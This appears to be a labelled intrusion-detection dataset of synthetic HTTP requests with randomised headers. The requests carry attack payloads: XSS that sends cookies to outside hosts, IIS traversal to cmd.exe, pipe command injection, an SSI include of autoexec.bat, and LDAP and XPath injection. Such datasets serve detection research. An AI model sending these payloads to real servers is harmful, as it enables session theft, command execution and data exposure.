From: 6eoetp@selEd.fr
If-Modified-Since: Sun, 13 Jul 08 07:37:20 CET
If-Unmodified-Since: Sun, 23 Mar 08 02:09:10 UTC
If-Match: "bblF.5q2rQrF.1M3ue"
If-None-Match: "wNpxZVFBdjNY-Ay"
If-Range: Mon, 15 Mar 04 13:17:35 CET
Max-Forwards: 9
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic b3NuZXI6Z0FvdWU=
Authorization: NTLM YXZuZWFpdGVoc29PcGZlZVRjcnU3aGVodGNteXQ0bmlhbm1sb3RjNWFyc2hlZQ==
Range: 257723-74,-66
Referer: http://www.h3trZh.be/dottanO/oseyo.jsp
TE: deflate,gzip;q=0.0,trailers
Trailer: Accept-Language
User-Agent: lxfs.w http://www.utysyae.com
UA-CPU: x86
UA-Disp: 794,0889,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5121x090
Via: zc3i/6.8 www.eeeDpg.png, 8.1 233.174.254.51
Transfer-Encoding: compress
Upgrade: oie/1.4, esndns/6.8, eengr0/5.0, e7la1/2.5
Warning: 063 211.26.149.166 "smbe8tiNrn" "Sat, 11 Mar 06 17:33:18 CET"
X-Forwarded-For: 231.143.90.28
X-Serial-Number: 30089699
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 37361
Start - Id: 36775
class: OsCommanding
GET /riisgwag2snmvivfoL/itogSoAert15l/ocbz/agtMLb9d-95xim4Bo/meJRSQfkpc@d/ILG-995T-YSHye6/ecdeeueEiar/dcHMU7r/8esw/mc7ulssoKrotclsla.jpg?adjgrhRrl=Lboot.inia2s&nt49eea=42479068&syawk8ctClavtfs=elo8o%5D3a2&nftnaekpo=%7C+++id++%7C&otejrsVo=cl+&VCxFobjecttiLQ8=460382&ac8=nut8Q&-cr9lE=61h&aae1fx=eoauFvdtlls&dF5e3hIone=r4BM&n0u6ehuu=aewo&9Hidx=760763363&awnhxheA=9928&T2ie=Zdrsmailo HTTP/1.1
Host: www.qnro4aEm.ch
Connection: lucTioso
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 41.112.35.248
Cookie: Isx=e(
Cookie2: $Version="4"
Date: Thu, 12 Feb 09 08:45:59 UTC
ETag: "pBn0o3Olw3j_mFz"
Expect: 100-continue
From: hqdnlp@uehby4G.ch
If-Modified-Since: Sat, 19 May 07 02:15:52 GMT
If-Unmodified-Since: Wed, 29 Sep 04 18:08:16 CET
If-Match: *
If-None-Match: "YzaWyouLc60m-OQx"
If-Range: "QU.j350IZO40kg8V"
Max-Forwards: 50
MIME-Version: 5.1
Pragma: ur7='e0iFrv'
Proxy-Authorization: Basic aWhvNWg6ZWZ0RGR5cg==
Authorization: wyboL acphzxa=ieoTe
Range: -0
Referer: /e2Hso/Tadt/s0sOi1o.wav
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: Mozilla/9.0 (compatible; MSIE 7.2; Mac OS X; eiu6cje; aEdara)
UA-CPU: PowerPC
UA-Disp: 944,674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 232x1783
Via: 0.8 191.50.111.146
Transfer-Encoding: compress
Upgrade: mew/8.4, w3bv/8.4, ttttf/6.4, ua5/6.2
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36775
Start - Id: 47728
class: XSS
GET /5d82Esc95gazZWkCeqtz/ibgsound/iAp_@8yWI1dT-M_K/shihitzexdrxaadcot6t/f51gU/-3BHOS/ebZ/oJMOpW2te45DrfDFOC@/tnaeeuisol.msf?1ty9tn2dh9=gadmin&desRshsny2=awiUkw+nhh%3Au&tn7tQZ97i7=%3Cimg++++src+%3D++%22+++vereitdero++++%3E+++%22+onmouseover+%3D+%22+%5Bwindow.open%28%27http%3A%2F%2F174.247.197.205%2Fie.dll%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E&nBEatsTn=nwdanrryTa&huAe=oiosiw&0N7Di=9932338766&wdocumentEHMt=bITHBf6kK00a&5bi=5b-uN&Yu7h=dtila4texhne&soirgioe8asnt=57330&3iminev=ute2%7Ct1exmeL HTTP/1.1
Host: 215.145.115.60
Connection: rhstbeSn
Accept: text/html;q=0.0, image/*;q=0.6, image/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: etmceans-urzeevn1
Cache-Control: no-store
Client-ip: 90.114.63.204
Cookie: paAdNAonlssnwe=06965;Manr=&eryfe/;services@gXLoI=9
Cookie2: $Version="622"
Date: Wed, 13 Feb 08 20:57:05 GMT
ETag: W/"HOfmfYPgzeuNvLeA"
Expect: 100-continue
From: aonie0x@uTdtewu.be
If-Modified-Since: Thu, 05 Feb 04 05:14:43 CET
If-Unmodified-Since: Thu, 09 Sep 04 16:51:26 UTC
If-Match: "u1K2pNZvaHrB.1g_"
If-None-Match: "gga56pZViP-pPxuf@g8W"
If-Range: Thu, 21 Dec 06 21:53:46 CET
Max-Forwards: 757
MIME-Version: 5.9
Pragma: Ne='SeAeW'
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: ep9mla t3deafei=hrshcr
Range: 73-845,-3701,335-21836
Referer: /5radsl.jsp
TE: trailers,chunked,chunked
Trailer: Date
User-Agent: 1fZ8gFQO http://www.srldrx.gov
UA-CPU: PowerPC
UA-Disp: 2301,334,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0710x100
Via: HTTP/3.5 128.46.66.59, 8.5 48.243.223.216, 0.0 159.87.208.196
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 499 www.ObTif.js "Thryti" 
X-Forwarded-For: 1.179.155.203
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47728
Start - Id: 48653
class: XPathInjection
POST /awxI/ierettiP/un62SpivNLf/z0meP/4av6/HWKGzR-a/uR6/LeY734R7/ehntenmsqnudEosl91l/dyege/b@.mspx? HTTP/1.0
Content-Length: 498
Content-Language: oT,h,ggAe
Content-Encoding: gzip
Content-Location: /eselhpE0/lMiae/iydi/Nc1i4/ythrIs.cgi
Content-MD5: NTV5c296cnVPcm5pcmVuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Sep 09 09:03:32 GMT
Last-Modified: Sun, 12 Dec 04 16:00:11 CET
Host: www.i37hce5.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity, gzip;q=0.7
Accept-Language: f-repsMRhy, r-psnoqhe;q=0.8, Dthinpa-nt8telNo
Cache-Control: no-store
Client-ip: 125.212.241.80
Cookie: YXHM5G-hNdSq=36;f0elastoanna8=86594;eUphv0nDd=I'r7]eotj6uw;seRyrta7po=ejiyi;srt0oxou4tst=935
Cookie2: $Version="57"
Date: Mon, 11 Jan 10 15:26:31 CET
ETag: W/"Z1fNqscfVlckNRD"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Fri, 04 May 07 05:29:19 UTC
If-Unmodified-Since: Thu, 25 Jun 09 05:27:38 GMT
If-Match: "khpo7Gi5AlpzPwYH"
If-None-Match: "fA8cmb.zXWJITyEO-nKi"
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 6
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: /yeR6oeM1/taus/6AektH/leaosx/naeyeo.js
TE: trailers,deflate,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 9.6; wd-so; rv:8.2.2) Gecko/13813314
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 6.3 www.idoe6.jpg, HTTP/2.1 83.166.180.82
Transfer-Encoding: gzip
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 2534410035139389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

iehatysat6=xsno&msd9S9unHf7hncm=1atr'     or     (i     <    count(wahed/child::text())     and     j  <  count(iHvzm/child::comment())    and     k < count(0a/child::*)     ) or  'sqyAi8'   =  '     atmqhep'    or&RbinAONFUQWbn-=es&x2sc=6930&CpcDkattov=738661406&yhovxaupaastosS=6453604&rqatnvsac=uaktp@aa$n&uSr5eeSec=0&fmao=uiIipeb&ee8ihIp=\ov&diso0suAULfh=mi?0ctwinntmo8ew&uhe1ehanrQast2=nmee&IrMhCi=O-t&N1lrTc=TIelo:hesio6ad

End - Id: 48653
Start - Id: 44476
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.leiattCk.org:80
Connection: keep-alive
Accept: audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=2146
Client-ip: 1.111.16.222
Cookie: Ynarent=aGlfyaR;etn=sppSjgi5A
Cookie2: $Version="51"
Date: Wed, 27 Aug 08 18:36:05 GMT
ETag: "W15-SZeMZOC6UIv"
Expect: nets=rpaui;afeisve8=e88t
From: bniw@mamjmaT.net
If-Modified-Since: Tue, 31 May 05 23:25:43 CET
If-Unmodified-Since: Tue, 19 Oct 04 16:18:28 CET
If-Match: *
If-None-Match: "G3i8kwl2xodSAkFP"
If-Range: Thu, 08 Mar 07 03:27:31 GMT
Max-Forwards: 286
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: iPim aofAr2d=3Nwtgct
Range: 31467-04,46-
Referer: http://www.2l5hMq.it/oeakj/aQseehon/nfbt.tar
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: n2Fw6zUjE9 http://www.ogs2ttgs.net
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4559x569
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: gzip
Upgrade: tpEs/3.5, ser/9.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 73463
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44476
Start - Id: 36968
class: LdapInjection
GET /bssfxgtptt/nCqjqo7IB1qbjotvh_l.pl?jv3ee=nih2zeA%3A&ontahaerqorias=4139%29%28%26%28objectClass%3DTzc%29%28%7C%28sn%3D+rG%29%28cn%3D8oi++J*%29%29&Utdoz6s=quy&454hxdiiRy=ic3hba HTTP/1.0
Host: 54.57.242.167
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: identity, gzip, deflate, identity, identity;q=0.0
Accept-Language: ytr-b9ena, l-eozni, e-1;q=0.6
Cache-Control: min-fresh=243
Client-ip: 248.80.57.117
Cookie: ae7=wkxdDF6;deLrel5n5=oev>e e0t;orc2trag=nxM0Vnrn5;0xtelnet-@bJusr=uN;1a4i774=078535
Cookie2: $Version="3"
Date: Wed, 20 Dec 06 09:28:43 CET
ETag: "-VzvVFgTnT9xXlM"
Expect: 100-continue
From: ooeh@nqieoausen.gov
If-Modified-Since: Sat, 27 May 06 05:43:22 UTC
If-Unmodified-Since: Sat, 13 Jun 09 24:54:14 CET
If-Match: "XQdXfvq.3bE@IFjdV"
If-None-Match: "b81RCllo4JeISay"
If-Range: Sat, 06 Aug 05 17:22:10 CET
Max-Forwards: 26
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="cttu"
Authorization: Digest response="a3524110d309a34cbD2cBE0EC2a0aF08"
Range: 84-,-422477,1197-5319
Referer: http://emkn.fr/navZt.jpeg
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/1.7 (Windows; U; Win 9x 1.8; zE-nc; rv:1.8.0) Gecko/45796093
UA-CPU: StrongARM
UA-Disp: 553,0581,32
UA-Pixels: 8538x2200
Transfer-Encoding: gzip
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 36508239
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36968
Start - Id: 36770
class: OsCommanding
GET /e93o2eXWCN-GwE/uosdaWareian/EU0dXPlBBRD6Za/ise9Pd7SAePrX/wim7a6hsn5ep/temcddEoeatlS4l1ysT/aHDFHIg8QHon@IIpqTkJ/osI-X4bB/E.Rh.jpeg?Xeosinie=tAataa&0eoed7gt=%7C+%2Fbin%2Fid&eEreEet8nmhe=mo&osc9sqnee=0751&_TofY9cywU8=40976144&7R2KiTVzXxp_=1272871256 HTTP/1.0
Host: 94.140.77.48:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: al-qsftnia, wHyte-eehaiNH, eEtxs-resm
Cache-Control: min-fresh=134
Client-ip: 175.79.197.116
Cookie: tZi8onu=4;egoseet5adhreas=352;rit2cur=45;5At3n=66026995
Cookie2: $Version="371"
Date: Wed, 14 Jan 04 12:55:39 GMT
ETag: "cVJDZYCIgSRT74iSj-"
Expect: eawot=sec7ek;bqrdn4n
From: hqdnlp@uehby4G.ch
If-Modified-Since: Sun, 21 Dec 08 11:21:07 UTC
If-Unmodified-Since: Fri, 30 Nov 07 05:34:13 CET
If-Match: "saQvoe@JegI55k.cM"
If-None-Match: "d5K1A-MUBJWdku8U"
If-Range: "ataN5.wa_JozING"
Max-Forwards: 18
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic aWhvNWg6ZWZ0RGR5cg==
Authorization: Digest response="eAcCed11F3755c174dd9353a700c5b0e"
Range: -0
Referer: http://www.epvs.ch/i0yrrt/leaabao/hsi51.pl
TE: trailers,trailers
Trailer: If-Range
User-Agent: s_E1eE http://www.dbrtpt.com
UA-CPU: PowerPC
UA-Disp: 944,674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 232x1783
Via: HTTP/8.4 www.hdbaitJq.gif, HTTP/7.9 18.18.230.126:6, HTTP/9.3 85.217.252.111
Transfer-Encoding: gzip
Upgrade: veestt/0.4, vitr/3.3, tohkos/9.8, ypboEe/8.4, Resser/0.1
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36770
Start - Id: 38230
class: LdapInjection
GET /6F-x_/f2L7.sh?lgooaco2nit=1&2NtdTSr=ea&ax-raccess_logdrop.Bnode_X=ehyIeCn&uq=t%7Ehtaccesh+&aliDtady=91&ekebl8gesleo=%5Dwindow.openshrlasrheOa&eeLrtwNah=diafoobodyb+%7E1&vh3d3bcsss=y4d&vepasswdRUA3mT997=gHDacreViI1e&ehdpecaeklrTc=1592421&yonpaah5r2xIte=brsan&Eeelrde3un=62&dt646ItrixleByj=%29++++%28++%7C+%28+++cn%3D*o+%27brien*++++%29%28mail+%3D*o+%27brien*%29&TSrTWN=rComyu&s1t=nsha HTTP/1.0
Host: 86.213.131.220
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.8, compress;q=0.2, compress, identity;q=0.8
Accept-Language: e1oattT-cShegnt;q=0.0
Cache-Control: only-if-cached
Client-ip: 63.201.6.101
Cookie: Ti=H6dp;htUlrimncsn=791;Psi9i=rowhnha ssiw;CX6eI9=m;esespPeoUfl=uktsH;ostchaeymeeeenT=4036237
Cookie2: $Version="541"
Date: Fri, 18 May 07 16:14:06 GMT
ETag: W/"BY2g_qEtIFk46DMqc"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Wed, 16 Aug 06 16:55:30 UTC
If-Unmodified-Since: Sat, 01 Mar 08 02:12:11 UTC
If-Match: "HIlWKS-mxv5p9s5KPfV"
If-None-Match: "_FL4Fr5OAtlqku3A2T"
If-Range: Mon, 19 Oct 09 24:40:55 UTC
Max-Forwards: 27
MIME-Version: 6.4
Pragma: yxaB6oui='iOp'
Proxy-Authorization: olshew aitLt=niTeot
Authorization: NTLM YnRvc2ZodmFhZXFodHNpcmRyb2NhaWVhS2VpcjdubHJlMA==
Range: 491-,605-2708,157323-67914
Referer: http://www.uoac.ch/snhtttt7/int9er/tEdiORu/tjse6dn/thsMUEil.nsf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.2 (Windows; U; WinNT 3.1; en-il; rv:9.8.4) Gecko/26101958
UA-CPU: StrongARM
UA-Disp: 5667,2371,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 525x5957
Via: sokhwp/0.6 www.ianyeie.jpg:9345
Transfer-Encoding: f3dNrv; 2O5r=trzocn
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 935 180.240.199.184:8 "Ehcivfp" 
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38230
Start - Id: 40403
class: SSI
POST /Qa9bELainquires/iT@1Lb4XGU14YB3goS/aasq.U1-..l3Z7t/eupSrOtIpl3aecaat9o/idN0kppRWvHd/iCy92Ucm.a/2wjh9Yv7mail54copyn/xPIynQ/cmd7s-k/gPRdivX/eDos/5eRy.5GSjiCz.asp? HTTP/1.0
Content-Length: 217
Content-Language: hTelAw,Tzxe,Stiteo
Content-Encoding: identity
Content-Location: /besstgc/wnainni2/ilie/aEgl.mspx
Content-MD5: NG5iSWxhOXN1dGtmbnRhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Aug 06 17:31:04 UTC
Last-Modified: Sat, 11 Oct 08 10:28:32 GMT
Host: 209.232.220.236
Connection: sneocofn
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: stDs-esw, e9to-bl, dilseo-i
Cache-Control: min-fresh=8
Client-ip: 16.69.2.56
Cookie: bbgsoundf0=eqc8wchb3enap;pLumrLr=6s:@%
Cookie2: $Version="13"
Date: Sun, 19 Aug 07 03:57:45 GMT
ETag: "JDL_bfFscQLVKNHiR9K"
Expect: 100-continue
From: nvecwD@airnsvo7rs.com
If-Modified-Since: Sat, 06 Jan 07 12:03:47 CET
If-Match: *
If-None-Match: *
If-Range: "7Vg6myhU-twlwegY."
Max-Forwards: 615
MIME-Version: 4.2
Pragma: no-cache
Authorization: UaneH hnznx=yoh6
Referer: /0eeWpe/upmwoule/3ukaee.nsf
TE: trailers,gzip;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.5 (Windows; U; Windows NT 2.0; a9-er; rv:9.8.1) Gecko/44584705
UA-CPU: Sparc
UA-Pixels: 5480x145
Via: HTTP/7.3 27.10.125.48:30, 8.1 46.31.231.76
Transfer-Encoding: nker
Upgrade: anoNn/3.2, nnna/8.2, etrp7h/2.8
Warning: 410 www.hett9f.tiff "rlxshbn4vdigo" 
X-Forwarded-For: 24.137.231.7
X-Serial-Number: 60721340787846
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ndiTemlriwh=<!--   #include virtual="d:\windows\autoexec.bat"     -->&IDWOxjKJeJ=eoooemaa&e0nnfSll=yn8Hny&rniaaEeed=ehon1hFapokMa&cHEPinJTzF7.=9015&RJaDJLF=nwstdfma&Deeonrt6hriDp=dteONyasgtsitet5no

End - Id: 40403
Start - Id: 37176
class: LdapInjection
GET /De7ywp/hEEl9SV1daV/ep95SVWHn@2m9/bQ@T2Q@CsPx6ULFK/m3vcqdYDkQLjJRGJp/aja/i.ncba7GwFkt.Fr/lLbcMg/rntG4oyae9Dhogncana/aisDhtpiN8lie8Qmhd/aopen61Byopt/e3qATe4s4eep9.msf?bee1oie=046&riit5fv86z=54800&ijffI4=54&eenrotasor6hnz=S78o%29%28+%7C+++%28gsL%3D*%29&isnoEbjriehs=1263 HTTP/1.0
Host: 95.183.181.214
Connection: raat8WiR
Accept: video/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: eeb-hpa;q=0.0
Cache-Control: max-stale=845
Client-ip: 105.61.31.124
Cookie: itHDspcrdafb=zsl
Cookie2: $Version="5"
Date: Sun, 02 Jan 05 17:11:24 UTC
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: pooroeeh=nA3Te;syttsT
From: aheoexc5@cnna.gov
If-Modified-Since: Tue, 16 Dec 08 16:41:42 CET
If-Unmodified-Since: Sun, 19 Jun 05 16:54:37 UTC
If-Match: *
If-None-Match: "WQ_-1Hx2FOdPcyy03L"
If-Range: "Z4G3T@eRECE7Qfy"
Max-Forwards: 77
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic YW90bmE6ZW16MnBhbg==
Authorization: Digest nonce
Range: 0-
Referer: /rnrrd/soei.gif
TE: deflate,deflate,chunked;q=0.8
Trailer: Via
User-Agent: 5fHAk0Bf http://www.2sEOsop.net
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 5.1 www.ne2sm9oh.html, 6.5 www.ngxis.htm, YOsv/2.9 www.htHA.htm
Transfer-Encoding: deflate
Upgrade: Tri/4.5
Warning: 662 www.decsE.html "thSoIrea" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 175208593
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37176
Start - Id: 46749
class: XSS
GET /iCdrj0deD8stbekh/r_eI.2YWZtgeo5Pe/s@g5d@kUnN3hUD2rsFN/eK@mlwtW.html? HTTP/1.0
Host: www.ohbwm0stfq.ch:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesesimp;q=0.3
Accept-Encoding: 
Accept-Language: htts-eeTnS
Cache-Control: no-store
Client-ip: 242.22.30.195
Cookie: gflprhcrIhu=pw2w;p9xkV=irli;aepNnhnTstSmms8=&<script    >[document.location.replace  ('http://www.oral.com/cgi-bin/nttirara.cgi'+document.cookie);]</script    >;ooAbdeehE=oMe;4yf=9087;GQf@=1cIKYcUQyOIW
Cookie2: $Version="993"
Date: Fri, 17 Sep 04 22:05:52 GMT
ETag: W/"bIuZiFX8Fd7Kv7gLu2q"
Expect: ooPsrs0=srnl
From: Nbtsa@emewereOk.com
If-Modified-Since: Sat, 17 Mar 07 09:15:05 GMT
If-Unmodified-Since: Wed, 22 Aug 07 05:02:16 CET
If-Match: "6_Ury3s0JbLzjq4N"
If-None-Match: "xKaSlxWZd9grvXilO."
If-Range: *
Max-Forwards: 402
MIME-Version: 5.5
Pragma: sgUfE='eae'
Authorization: NTLM bXRyRTE4eHNudW9tc29pRWY5cm9keWVhcFN4bmVpdDN0c0llYWpoMw==
Referer: http://le2fU.it/stnoze/5rnls/teL6n.pdf
Trailer: Pragma
User-Agent: Mozilla/0.6 (X11; U; Open BSD i386 9.1; Nd-oy; rv:9.3.4) Gecko/60003608
UA-Disp: 8606,8749,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0200x693
Via: 1.6 145.22.96.253
Transfer-Encoding: lalui
Upgrade: PTikh/4.2, erb/4.4, rrit/9.0
Warning: 875 122.139.225.158:6258 "aai2etnlaMhefE" "Tue, 03 Mar 09 16:40:46 UTC"
X-Serial-Number: 6732905562
----: ------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46749
Start - Id: 37078
class: LdapInjection
GET /cBuM6.html?FJg1XG1DXS=exN.&vbscriptV8ftpLb9cY=7&ikjgiehrme=t%5C%3D+%3D&httpsiSCGGb=%29++%28%7C++++%28ti%3Dtvbn*%29 HTTP/1.1
Host: 77.4.15.1:106
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-ce, utf-7, shift_jis, cp-950;q=0.3, x-mac-cyrillic
Accept-Encoding: gzip, gzip;q=0.0, compress;q=0.2, deflate, gzip
Accept-Language: fenzgt-ie;q=0.0, daverle8-trl, tEHel-nEs80Bat;q=0.9, 6dstlObk-sw
Cache-Control: rtO62an1=rthEoae
Client-ip: 155.64.137.82
Cookie: oaaoGo3a=enFsfxa;ed8pi=79;geNlrolut=630000523;lauee=$hdrmlqnph-6;cenodeurll7etjR=h4deletedrcphhsemewdo%4lc;0niis30ae9OhtLn=0195800899
Cookie2: $Version="5"
Date: Wed, 27 Sep 06 19:00:25 UTC
ETag: "Qo5vB6y78EBMnbaX9j.Q"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Sat, 27 Oct 07 04:44:57 GMT
If-Unmodified-Since: Fri, 02 Mar 07 12:44:31 CET
If-Match: *
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Sun, 20 Jul 08 06:55:29 CET
Max-Forwards: 99
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic c2V3aWM6TmFhc2U=
Range: -5
Referer: /NL7nvte1.htm
TE: chunked
Trailer: From
User-Agent: eadtf/6.5.6.0.1
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7857x018
Via: 8.8 28.250.128.72, 8.2 206.243.230.150, 4.1 194.218.72.108
Transfer-Encoding: compress
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 905 www.ilsemrE.gif "n9hMwntaulc" "Sat, 03 Nov 07 02:21:06 CET"
X-Forwarded-For: 4.45.247.215
X-Serial-Number: 252851
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37078
Start - Id: 49751
class: XPathInjection
GET /nZYTWvic484-B8l/Nn5owlt8si6/w9lrhxJJp/aaqr/fedbv3eim3tt/oXPdK72EES0DaVy/6f-HZEULxQ/s55ExHDqsCfMK-9Kz/nbG6hw7ysc2/aKTgE3dDU/Enho/h1.htm?ntemTe=documentau&holntSmaram=esrhwDt%27+or+1%3C++notix%2Faop%2Ftnnre%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D62%5D++or+++++%27dsmt%27+%3D+%27 HTTP/1.0
Host: www.oeocyOa.ch:38
Connection: close
Accept: image/jpeg;q=0.2, video/*
Accept-Charset: *
Accept-Encoding: compress;q=0.1
Accept-Language: *
Cache-Control: 9r8='nthie'
Client-ip: 24.134.122.55
Cookie: bZi79qpBS=  rS2;S6ic=dS4i;sjutdwtnn8Eu= n;da=43574573;sev8lls=76
Cookie2: $Version="0"
Date: Mon, 19 Sep 05 18:45:34 GMT
ETag: W/"C6vM2QmYRX16nGaa"
Expect: 100-continue
From: tyese@ksT0ri.gov
If-Modified-Since: Wed, 23 Jun 04 05:30:37 CET
If-Unmodified-Since: Tue, 06 Jul 04 08:55:47 CET
If-Match: *
If-None-Match: "yRTqUh.zN_gEXj28llO5"
If-Range: Tue, 15 Apr 08 17:44:15 CET
Max-Forwards: 4
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: aaoe afoasci=wwir
Authorization: tyoeey anees=satta
Range: -1702
Referer: http://www.piesyc.org/byaeeui/qihl/EII3oo9/cfhmTCyi/aghed.mdb
TE: trailers,gzip;q=0.9
Trailer: Cache-Control
User-Agent: msci/4.7.3.6.7
UA-CPU: x86
UA-Disp: 317,738,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3095x7377
Via: 4.0 www.ooleolsE.jpg, 3.5 186.12.230.187:812
Transfer-Encoding: deflate
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 940 www.6w5rh.css "vt1sutatiosqrr" "Fri, 20 Aug 04 22:53:09 UTC"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49751
Start - Id: 43713
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.svNfo.be
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.3, shift_jis;q=0.7, x-mac-cyrillic;q=0.2, euc-kr;q=0.0
Accept-Encoding: gzip, compress, compress, gzip, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 183.153.88.199
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="684"
Date: Fri, 07 Aug 09 05:37:42 CET
ETag: W/"pzeg7NnTojdmoLxmh"
Expect: aarl
From: nnlogc@ewfasl3.ch
If-Modified-Since: Thu, 25 Sep 08 14:38:23 CET
If-Unmodified-Since: Tue, 19 Jul 05 09:48:27 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Feb 08 23:35:21 GMT
Max-Forwards: 064
MIME-Version: 8.9
Pragma: ePei5c=odw
